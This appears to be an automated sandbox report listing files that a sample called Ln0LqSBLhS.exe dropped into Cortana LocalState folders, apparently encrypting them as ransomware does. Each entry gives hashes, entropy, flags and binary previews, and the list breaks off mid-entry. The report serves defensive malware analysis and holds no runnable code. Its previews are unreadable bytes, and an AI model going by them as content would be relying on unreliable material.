                                                                                                                                                                                                    SHA1:F919EB080B57DA4F62C79B3D69B1BFB7139B761E
                                                                                                                                                                                                    SHA-256:A6A8EFA8D2DB8E0C4429871113E05C89CC1097765B45700AF9BFE1496DA637BC
                                                                                                                                                                                                    SHA-512:512CD05B66E99721433AF6871F1667FE6D61C5666176F72CE405783B956FD5B2AE1432CB7879A1A13D26854A996316D991FA0419083552313457F090EC4967F4
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ....'.......\.W.8..0.!.R....}.X...?.q..J.GB.02...2.Sj7..2%.^.cD.D4..U..<#rO./9...1...oc.@^.y.]\79%.Q...8.1C.W}J.... (X..R.&...m}..:[".e.M.....wI.n6..O"..M +...;q......H.I.l..&.aT.k.-.s~_.../......5..o.......*gGU....bOp........h......H7..[..h..5.....WZ.......OJ.X..sY...... /.G.^...g...Ix...-..9Qt..2.bf!.......@..H.......eMEZ..,.1..o4Q.4..y.(...h.],PX;..."...B..+.n.x......z.v.g.?...no.M<...._....K..u;*....s&.....k.q....9....P..^.._..c.E.ZU...:A.B..Lv....x..TH=..5......2..>N..#E..'...N..}.Z..@?`...y.w..{..'S.X%...5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{c489dd0d-bac7-4129-ae50-28d7b3fe49ef}\settings.schema
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):491
                                                                                                                                                                                                    Entropy (8bit):7.49404016996419
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:lV8+ow1GU9NN8H+a87oL7yJfwD6iHoDr4mzFETaI+cii9a:Y+5NN8H+aZLm4D63NzFtjbD
                                                                                                                                                                                                    MD5:8E5A95B22F488396B8497E541162B6E9
                                                                                                                                                                                                    SHA1:9A82B970130E6A8DEC32C1928E93F8A3C8435981
                                                                                                                                                                                                    SHA-256:E890413252E56E7BEC283D62BAA67D6A3C6576DF57075E0C19FAE36F641B478E
                                                                                                                                                                                                    SHA-512:05276F953627FE2A79853098F67462689748E3E310CCF14470CA40DC1C3CB54A5E3BA2143FEB39FF5BD778B8FFCBC97C63C0A1A2975CDA567705ABC189205897
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .N............a......2...}..{.6.1.....a.U.>..B..W.]%../!.d...r:...&m...'.a.,ef..._....V.....P.1......6@.y......i.:..D9...f4.x.{`.w`...?#~6.E.......N*......]C.l2a.R^...5..>../..L...V.#.,..6. P...R...a.N.^..$V............x...'..z.......x[..ja....7./.m[0<......?.6..O,.k.a.6.h....a.0)`..;...I..=...].....up.....!M.&.f..Q?...6V...;..2..F/.u........|.,...5B...W...W.......E..*g...G7*..@....5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{c489dd0d-bac7-4129-ae50-28d7b3fe49ef}\settingsconversions.txt
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):31911
                                                                                                                                                                                                    Entropy (8bit):7.994408912161231
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:768:QvVFjokaVGjlMMLUIaMP+YOqUi/A1+haXddOxjEST+XX:yToAasUxMGFq9oGueESyX
                                                                                                                                                                                                    MD5:2C9DF5807EBFEFD8F552E98B02F6E7C6
                                                                                                                                                                                                    SHA1:B102252D408655AA1671324163B3A33C38C82CB9
                                                                                                                                                                                                    SHA-256:1D310C9146DD7E89454DD1F8A85DBDCE139393F581F941826F5243909C52C637
                                                                                                                                                                                                    SHA-512:C482267C9F025447254A50F0E361DA3EE26444F4147ED3A8E6ACD16C9AFE74CE12D331B98935D71666D6ACD11AF6D2D56CE5826C289050C5A59A502A687E5E29
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .rY....o4..Go+^f.............[+.M.1....IUP=....L....o.Z..r.M_.'.T`...u..Y.s..ZUS+....~....vY^pn.E..),.4+......t.^../*?./...[.f..i..NA<...^..[X.5..V...rCX;`+.....:H.b].t....K(........._+\XG.0.....x{.b..>......eu.n]t.H.$...l.}u..e.......M...j.q0.b.{P..A..JV...0qE...[.E...^.)......_Y...t..Q.....{.....X.Y..N1/..6e..%.'..".x...8.[..jw...U..{G:....2R....h..Ea..&..n......uJ....9+bP......S....I..3..G..W....>X.o.........L.6i5O-S0.80a..s{....VF...Xf...O..~.<v9..v^...P^A4H.._..Z3ay%W...8......5..Q............"..bL.6...l.Q.u.*.'........[O...-.^#=D.c..K......._..'..D.`i...9PX..._x....#.....bG..c1.m...s./F..7..(.W.;..pK^.?^.,.Ke. ..y.e. .i.....`x..5.... ..%rq-H.A.....&..d.v#..V....%.t..,.....1.,.a......l..J%.N`.. ..<.].uD..CT..K..!!+....=h.`.6..#.+...Xq.#....2..E]U#.z.G...-I.....v..d...........(...{9|{..f..i.Y}.|7}j..G.........G.."$.as..[..,.C\.e...G..$JD9.9(.,..V..&[a7.!C.. .r...{S=.G..l.j..x.F\...U...........t..p+2(.p'....<...r.P+.l..+..wl.7c.ta^
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{c489dd0d-bac7-4129-ae50-28d7b3fe49ef}\settingsglobals.txt
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):40808
                                                                                                                                                                                                    Entropy (8bit):7.995481535067707
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:768:QVKEoax0ljOg8CciR9ITbhk3b7GUg00xfrsIwr7FEMnvtN89+ahU:QwNax0lX8CciY0b7G8aTS7FVnVCfhU
                                                                                                                                                                                                    MD5:7B3FA125106D2710B3FC688633EA2587
                                                                                                                                                                                                    SHA1:3B1BF6A51A6C5BF21DE947E2EF2EBE09F3D387AE
                                                                                                                                                                                                    SHA-256:CA754AF3D5EC0F8E5CD01BF22DFC35DD2338D151DFFEF9C05B138DAE3D123ABA
                                                                                                                                                                                                    SHA-512:F70D54BDCD11E6BA35171A07CF57F660DF24DF8CF7F3849FE6361D1E8AFF5F32A38176CD5568F05B1196309C2A52CE694AA05331847082E4E77431F17BF77C9A
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .S...*..Y.zdJ....,..B.P.mby\.l...,L6.iiE!.xJ.9...{.G.|..\.t.}.r.A....d.u../..{~.i.F..| ..%._.c_.u!...M7....Q...:..{pirq.+)#.$.2....eW.xW......2e.CK.....'N....@...p......!....Y;...:....a.5."......RT9...b.T#~.zD....-Jn..3...I.^.@..11Q.q.4Y_.E.yg...W..N.*...m....k....\XY..8..wdDW...e.M.....,a..O;H.*g.w.wQ...= .&.jUl/.`{k%....c..i1]..\...}cu.JQf..L....7.O.I...|....w..LZ}.-..r.]g9..n8..z...$E..P.=...Z.........%.*.xu.%f......w..y..y....U....G...<...A.s,......{.:.&t.!.i..*]6. ....\...V.B..97.....;...7..<.T)p..[.._.=.....T:.SR2j.NM1.P.O.]e>..d6....M;.n.p..3..z........c....o[.qg7.\p...........-v....Ub......)..2.....$.Q.kq.4.j...J.]'....cN".|cz[...>x.x@..B..J&...."... .S..M^...C.n..|....L.d.s.r.5.....r/h$.G...-[T.. ..PT|....."_R....E...p<...2.DQ.....W..........~...2...@a....Q.*5&*......,?.4...r..c.. .....p..yd.RL..?|.S....Cn..n..F...2...VV............<.G.....8_...f.... ..A.;#.G..2).@m&,....|q.&y&......F<...yv..-49.6...Q...$..-.l..'6yM..i.z
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{c489dd0d-bac7-4129-ae50-28d7b3fe49ef}\settingssynonyms.txt
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):76895
                                                                                                                                                                                                    Entropy (8bit):7.997315722750495
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:1536:vGT4kAwsLw+Fq4Oc/bVNpIRJIIzRKI9CdCL+:vGT4ts+5bb/uHjV+
                                                                                                                                                                                                    MD5:CB5A0F3EDF58BF0010BDED7583159C8B
                                                                                                                                                                                                    SHA1:6E444B82A4C7C64C566092B40B56CB69988CF665
                                                                                                                                                                                                    SHA-256:C4D839449CC1F7BCA3321BD5AE055724196982CB8218CA4FA5B4D89FAD2F2494
                                                                                                                                                                                                    SHA-512:C92769070672402D0AB56D2D8544AC6702558A44BA5CCD57D406BBE29FBB09092B9FEA121315DEB4262B5E3DF6064044D56FE2F9D78045EEC3758B13629EC3A3
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: v...Gs.(.h.D....g.x{Y-..b!s............p.M}...K9._....../[..h...g...9.S.V.[......N.92..^...K.K...~@...w$..u......4...#.w.@....,.........r...W:H.....P....z?\s?.U................*..i......Oy.jHJ5\.v.e..49...')..N..g[?...u...8.......0<.....pN......@..........VA.Q.z.P.B.u..M.E0/..U..Z...[.g.PD..c..G;....t\o.....N..U...8..8J.v[t]^N.UJ.0../.R..5.D/..;E.JZ..[..R....!.t.,.q.....2.B.... wH=.O.]..b.v....V...k..........l...S........(5L.~.%......_O[.....Q...J..4.......k..V.(....8.n.u..v!.y../*..?..K.7.J.U..q..z{}2...D....1i.A*,S~...W.....4?........i.!:..#...O..Z.......(b.J.M.D.;.K. pg'.......=sr.w.........].{Y?..eV...Y.I.[.9.....+.4..O..m.8.n..Z.{a.......I#K......S.DMw.t.<.|*!.L.i.j..].7...QU(.......9.B.......i.....^.o...*..i~..3..+ ..?.gHZ..Y<...&WCF.....0........K.(...a....ur.....i...7 I.]"...:.?.K.{G.Q....YD..%.9UB.[.....g..?b..^.....XBe[\.O..T..c....H..Cp......(.4..Ly?l.`....!Y.D..ED..Y.O..Q.E.O..2.P.8.S.H....-.Q........4.e.JwW.....r+......{
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{311bc890-0d64-4a61-ae62-e2a43e6cb7e1}\0.0.filtertrie.intermediate.txt
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):111674
                                                                                                                                                                                                    Entropy (8bit):7.9982504135659775
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:3072:cM0t6YTUh/ZHCYF4TzMJQ3zGph8q7/E6aPDjs3hV0I2FuOs:cj5TU3HnF4TzMJwih8q7/G03nf2FuOs
                                                                                                                                                                                                    MD5:B218F602794C7EAF7ECBC8279F61B6BD
                                                                                                                                                                                                    SHA1:58304099239201CCBA0F62300ED04F80AC3F5B5E
                                                                                                                                                                                                    SHA-256:994CEC23F50EDC6C2DB4D856822D766983A1E4078BD0794B93A9421FD1772335
                                                                                                                                                                                                    SHA-512:E8F7E57EDD66CC3C26B33F54C07A9BF049630FB1D32556B5082A22D137882FC36D3160BAA26241FE6381B95E2618980066C867C73453B62B420D0FAE222027EB
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ...i....^yG.l...;P*..c.r..-fI.b..>....ZA....1~@us.Gy..gF....^....JD......6`%V...........V...q%B.*TO..y....!.J*.C$..I...sR...X..)B..fU.S$.Uq^.dF.5.....X...sFS......f....i....g7..;s......._..@#<....p;.w .$..-o.(T~...V.S\u.e..\....&Y.z....,m....r..............=.O.........DL..T5.G.{.X5(.C.%..h1/.......=E..o.....KC.v@.;.......@2v._=..f.Rb._]...1...0..^...[...}..W6...p.my.6.<..)3.........R..6..8.v....O|$.=.....W...;.$..%......A.......+..&..k./A.!.....7..Q.'.(l...t.a..(...R..fq .j=..]..J._.Of.\z.eR...(O7.sO.r.Q..s8.4[F;V`e.xJI./..%.%;.X..>....}'?U..n...d..S'.....'*....z6.Hqk.w.p./yaj*..okg...n<n.........Al.......P.....D"\.Y...:..W....'..O..P..}.q..=...C'......^b.k.........$.....".K..f.+..2....p..#m..........W|+....g#5...eO......s.....}/_......\.@..p.D.Y.~v..hm....-.u....k.....|..Z.Lx...8f[.V.j...:.....<......z..7_.K1.T....T..`..K...F..m.T7}...........9Lx...............{.X.....R../.IYbxNa.@`."9..;X..v....K.J+.?q.A....C.3...~......5,],......n.AE^.
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{311bc890-0d64-4a61-ae62-e2a43e6cb7e1}\Settings.ft
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):131693
                                                                                                                                                                                                    Entropy (8bit):7.998584289856382
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:3072:5eMWbVpjRVZ3IZK1yCbik/CtwUfkLk1wkkCW+Qj78yruO:5eMUbv43YgwGkLOkCLG7zuO
                                                                                                                                                                                                    MD5:0D6B7AEF4E5B4DDA91ED1EFB001441FD
                                                                                                                                                                                                    SHA1:B22B8DC345047A0253019A47F438FB9F9D713B81
                                                                                                                                                                                                    SHA-256:AA92BDC009CFE5CB80A335FF8436EBF2E96446C331FC875D847F8237187C91A0
                                                                                                                                                                                                    SHA-512:A5AD902CA371448860B8217792F25F70574F434C048434AC8E573A7E967232107829558D5C2537FF28F0A9E64F5B5A3256755A831BA78050ABE0BD80D32FDB5F
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: 0WH....BNI.....[.....PX.<.Q6..t..(.a..Iy....<.a.'%.F....&.....P..B..<<.m.a[~|..+.?..e..O.._....;...#^.m...8*...;Yy......*.....6X...3.t;.7.k.A.=..>g..U...N....N..$|.9.k.M.{(..R......?^.......j..n.~y.......I8.o.h.XI.(.p.6.....H.,.....7....?...7f.......W..}.......i!....N..JZ..6|..>A...."....,.GQ....V.[.S.b.Y........S....S.p.....!.G....@.);e..JC.v.P........y$.....-.1.V.<... ..z.?.<.&O..un...|.%=.Z.....m..soE.Z.....8@.*.y..i..9...k5..Sq.(.x........Q...\..9UA....g.Ys.P.,/p(.#OY...@?.T...Rz.TR..p."B... _....~D....o`...X.nP...b......;.".X.. ....B.Q.....;.09f.A.OF..?.U....^....H.Aw..~.....c.$....{.d..N.. ......e.f.....^8..#.*..-.S......./HW...{...Z.X...8..t...E.r.;...u,..`.wn.W..t..|g.............l`.i..X......\5.|..i./T60...2.Y9....,....^...u;...&."i.(.*.41.]&\}..T..p......d..L.......#T....8...`...\.~.........is-.E l.V.5..7Jp..V.S6I...ta..F'.....`M....A.X.B.w.K.*...>)..q.C.u....p.&..v..e.V..*J....Z............d.).....m...=....D&l..fe
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{311bc890-0d64-4a61-ae62-e2a43e6cb7e1}\Settings.index
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):153934
                                                                                                                                                                                                    Entropy (8bit):7.998716573416229
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:3072:8yWb+RDAkqvG7xbFA3TFO1TLy7P2TAn7X7pMYpTTGIROYV:8WRDAkq+79oFQTLy7PPn7X7dTYYV
                                                                                                                                                                                                    MD5:9A654A727494F29E90FAF15B7DE2DC1B
                                                                                                                                                                                                    SHA1:C90065284AB3338C9308306BBDECC82FFD472884
                                                                                                                                                                                                    SHA-256:D45A6538B15073924B994AAEC7F59C5C386428CC3D5F504199572ED228044900
                                                                                                                                                                                                    SHA-512:31DE0815734B8B6626E2B2EBCA0139F8EEC7996F452D1B0B308C3E17F2F7260FC71E62FEFED459D846F3F90BB0A577A40EB54F02BCFA65DF5A2795D52B5CE0D0
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: v......pn.?_+vc...3.N..XDL.v...7..:.......4l!....3...<....0?.c..P.r..D,2P).PZa.b....V..+2Z..;.4i..>.............y.%.....f._.....o....j......sR.W&.C.......9!...."...e)"....H..[.....I.r.=y.&s.LO`..7./..4....^.......P=.....7.....Y....VU.....$..W...%@[....u)H.."...Xv....Aa..mm.F...'.VFI..=..=...P_..,[.O[.....g.z.p...KY*X..U#....}>...aO5L..6..c.-...G.B...V.......7..Iy.w..".>.c\......J...X.M...<....j.....s....3....@u.....6...79.[..>...J[.8P)...z...V..AW?@.@:N.=.5./..>.v..0....\..r..;.H....:..2...$..W.....c.....G..!...|.....).,.RK...a..L.K!.6..d..........T.h...C.,...J.Z0...,1f.c.c/HG..X.hy.[.L..k..&..rB0l....mb...`.cD#.B.......4..r..VV..O#...x..1..&.{.J...[.G.Fr...E.y$.4g.....D..oS...F*......k.....+..".....z..M;\./.S..af.......Z.I......H>.?..h..}.-.P|p.!.=.8...t5.....s..Mb...2.~u9G/`Y.......U...6...9..w.D.`..w....s>..g._@.k.=g.}...?=c.<..W.!.bG...R....X...k.....3....v.AXi.......9.J.s....c..t.....U.Q.T..+(...&.....).^<@.1.X.N,.g.v
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{383cd175-ae3a-4e7b-8db0-9b5863f23264}\0.0.filtertrie.intermediate.txt
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):111674
                                                                                                                                                                                                    Entropy (8bit):7.9984332798681175
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:1536:AX2F8M0uF+qnV7l82CdmCVx6UyTrqMyB6IY8RVoafcRWdvVy/nhbP+b/JsTRkNwW:AEF3KYqOrqMyboPRWqF8/0ONwOnm2T5
                                                                                                                                                                                                    MD5:361A83E60B3FDB083ED04EBEFC3661B6
                                                                                                                                                                                                    SHA1:EA36081905A7207C634932398D47DF4476B7C8AB
                                                                                                                                                                                                    SHA-256:B39C291DE106C863A03C8705855CAD380095615BF1D48400B867D8A13BB23A7F
                                                                                                                                                                                                    SHA-512:77C68B731C013F08DBC8596E30E719231941BAD1CCBD6A8A781E14B004BBAA6B34553C13D35ED564F3D2C5294D74908F06EB4F49073FB9DF4B303BD9372A8AFD
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ...2.y.\..S4.6.U..j.....|..../...e..z.O..?..t0PS...i.f..sxk.`Wh..p.v*.;..9":.U........... x....;..c..s.\...w.Xap.E..?....#vA6I...n).Cq>.ER.u...l"R....*KZ:./S.r..AfNk.M..\...r...G..",..&..Q.j%...g...8U....L.:.......aG.o...w.!..H.9..,=..h?....b.LI..`..Wv..{W.~(.....I.../..Ml.z.t....R!......t.%4U..../.7D.<2-.M ..3.......i.3...9.E.8a..t....r.1....Q..J?(....`..?....<`..:..s...$.-...#..dM:H.....n{.&.s@.....dPf...{..%.@_..p.b...y.11..nw.....Zq6........~..c{..0.......v_...3_x4#.l..2..X;.P...y..1l.>.F{..c7.a.B..o.4..J.Y...U..B.A._..*.......x.......F2...K.(.f.^.5&..nT.=i@%..4k......".Q.%t..@..y....e...._.....h.P.*...h!..(........t.l}..k..t..e..c...........'y....&j...#...A[.^....BP.6..+2.w..m-.T...O.....\..Q.>._...N.Z..^Y...<..ys.Rd......t.y.^.\.v#........8.x.\.<...m.....&0..1e..J'.4.p.S...=.D..^,tB.Kq.DJ...........Y....!.]....[..*mFFL....F...aV.+.*..!)..`O...4&.T..D.9.GAB^]..H.6(...Gn.....y!....+K.`..../....'...@....>.9......s9....m.g2A.s.s...
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{383cd175-ae3a-4e7b-8db0-9b5863f23264}\Settings.ft
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:COM executable for DOS
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):131693
                                                                                                                                                                                                    Entropy (8bit):7.998515288067736
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:3072:dSPJlBbwITplcVlnKv6P8H5T6BtvhjaFsRGe0XTVc:dSPeSl4KqS5TQRfRG3XTW
                                                                                                                                                                                                    MD5:4EC448CDE64FCBD8E66B5A316DCF2A2A
                                                                                                                                                                                                    SHA1:E06B3F24C006A9973685001DA11ED87802AF1268
                                                                                                                                                                                                    SHA-256:EDBEF7CC7FCBD3C536ED0339BB8E8523A38C4BC8AFD405933A1E6FAA1960BF5C
                                                                                                                                                                                                    SHA-512:5B676FE1FA0F8E1384E80C99567F60AF5F4336E82A0628F04BC8C2779E6B192111E7C7B2F25AD74E797AC2BD8A95493C31361BC4E3EDCB03FC1DE12DE06D52D1
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..}M.@.....kr...Q9w5..c.O.".L.*....k...S.[`...........W+Q~.>.5.Tg..[.....0..h.....Qi...Q.G.2...eLKdJ...P^....5>..8.w.?2..L..9.L..K..p....Hs...u?<.w>..#.W;V&/..>..+K..9...<.,.........5$.(...$......~i....................z.-.r.5....^.!..C..5.}V.sU_....^..)9I....d.X.+:.t..'..#..MW....n]...|...GEat9..LG...U....VP.....e(.....a.C.n.1.:O.j..`(...H....1..2....c....!t.x....P..us. ,.vu..o..4...>.m<..J.V..L}.....p..o..iB...G.+o.....q..V.n5......Q.....V..z....9\&0.G=..?;dbc..el../L7.%.`s../..W..NK.........T.J..".].M.q....E..C^G..`J8]..f?.^....Z.~...I..'q"....~.I..pU.....nbC..KY..h..}..(W.t.'....r<....S..].......R..?..~....k.Q.;L...Wx\$...V..2.B.........=.8U..h.$<.N..|u..!fE....1.w.`..........l#.f.ZC..^.&M.u....2.l%@.K;x=d$~E.2......W.;J..j4....'.=..T..m8.h..-....B..8a..2[.o*,}..H.D.o......b....J.~.L../."...Z.w..g...[....K...\D.......V|I.5.p^..}h........].A.M..l....v.&.p...I..2l.....p.O!..!-1'.......}\H...M.4&.....F.I..[j........(..[Z>Q.w}...1_..yFF~.Mw../.{.
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{383cd175-ae3a-4e7b-8db0-9b5863f23264}\Settings.index
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):153934
                                                                                                                                                                                                    Entropy (8bit):7.998706931016237
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:3072:cG9ueBc0O6sZfov8SG8fUoc2/Ppeqj0JAaOMNzo70/M8luLQa7C3WJrBP:ctaW6WfzSG8solHpTj9MNUeM8laPCK
                                                                                                                                                                                                    MD5:B25C0013BD23AD54C6A59B61BFF449F5
                                                                                                                                                                                                    SHA1:D8B5301E023D591AFAF69FDC4BF3E4B13CA9975A
                                                                                                                                                                                                    SHA-256:4EDFEEC9B3A862171B65C8B66379C8FAABB201BAC4B3C948FAC8DBA4AF48FA57
                                                                                                                                                                                                    SHA-512:0AFB932404A0802101D1F5FD09F28920FACF5973A7ADB0BBA224D045E3B99D52D948D85A7700C1F834F4DCC8056A6524FBA434EAB10DC2438C8ED6A2DF5388A9
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .-].r.../...+B...7.F.\RX.. 6.vh.g.p.Jk......CN..U.Y........Y.3..M...68......$.;...EMF{.K.Z.....SUt....+..&.%..".....!..G.R.;...{:.>Q.\.B......[.,.;...yCG.b,]&%~y.%.AY..+r.....k..d..6.+.hn..w..[..)...|..p...R....+..+.m.eb.$....\.3x...xr..v.&...A$e.S.RU..C..%..z.... ..*.4{.....;.......d...fE...C..V.r....t.5..|.V..(......[...^..vV.n...UxV....v.W..e)..Y...$....!t.m..k.0.y........7.........8.K..q../:...-3."..<....GL...d..K._.Rg....5.....iN._\..P.......].a.AW.\.uB.qb.F..c.Z...D.:...h....P.....E$..)!...2....).{.....c..c...........5..*...S.3.eP....gZ..<}<..!.M0...I.. b....xN..=.i....Oeq;(....fe......5...K.!..a......U..f..W..{.q.h...t.>..@.N...RC..g.|iY[.X..mg../8....0.p@..G.>.!.....`<..X.....(.......g....a....,\Y4.2.xK.f.5.1...9f5:(m..z.ab.{..4K..&....u....8..r.....E9x..C0..J..'..i3_.w...~.*..F.D..i.......0.AZ.^8^~..!..|..\y*...'.......hS..`.Q...N..vZ..y...6P9..$..n[.....,....% ..lSH@....~).wk...d(..Cwy......c....H.$n.b-.=.y.....&.RB{..?..B.*
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache132748172358346066.txt
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):114329
                                                                                                                                                                                                    Entropy (8bit):7.998375879571746
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:3072:6cLf/ffW4iTJK6Tvrh1y4qy6C8P/MPWWkigOyMRAtOXL9MIles:eDNnTTVqtCA/MPWziLbZR
                                                                                                                                                                                                    MD5:A8FE9F997311FAA60AC098DD8FAA72C8
                                                                                                                                                                                                    SHA1:EAAC76BE7C192E7A69C169D01122FD8BE286C204
                                                                                                                                                                                                    SHA-256:12B2BC54E11F8C397B50E37FE7FC934F01A31964D7FD74AC6B86679CFE51189C
                                                                                                                                                                                                    SHA-512:4200DF1B891CFB76736C8A906B43C19A20BB14DE706356A720127E7887D1D2DA2057E3AC3D9B7A8C46F307088EB88521DB7C2BD6EC9C298D26B54CF600E316DB
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ....=.#JE. ...y.....%U|.5Z..@....Vc....5J....Xd.jf`.'MV.<Q.r.....8....(5.*......~..S.u..4`..../..Z_.....}.H..i.O...?..uri.B.Y..".eY.........&..V*Y.O.|].2.^..mr..nT...0.w.H^r?dP@.l...:..|.....w5'..~..OkD...NjAe?&.......Q.E.....uV*..h(.:.!..f.h....~.m.b...,-G.j/.BTL)...f.bl.R...b.=.......a...]b+...".....n.>.MCx.|..F.+...........V....i....z.3..^..0.J.....~.o1.-i..NB.U.I[.P.\..P..~.......[4&eat.hU{...Dq.!k.=V(;2..Kh1)..w.........P\o...X./.....>A...wJ7......mr4)..S...:.A...~.r./.8...f#.Ul.0.H_tb'..........\......ON.....pR-.....!\z..u^v.Pp...).>P...."9.0.s.....jp3.a..n.*...q.^.....B....._..F.....<.\.....'..t.._....0_K+..,;. .4<..+9..c..e...V..ur...i.....p.h.&.....=.a..o.......)..TI......~...J...r...Y6...7.S...wTh.G..2..J....B....f.K.Hz.ysf.M..&._.P...>tQ..,.V.n...|.r.......A.J.Z.h..^...V..E....,G...2.(.B.. k...WwPT..v.{q..qv.!m...!.3...$..."...3.n...k...0.z".j[..c..y1...{.R....N.......... ...u.|...........A.Cx...Df\..i.0..x.3.....,p..j....%..O.
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache132748172368747068.txt
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):114367
                                                                                                                                                                                                    Entropy (8bit):7.998277880705685
                                                                                                                                                                                                    Encrypted:true
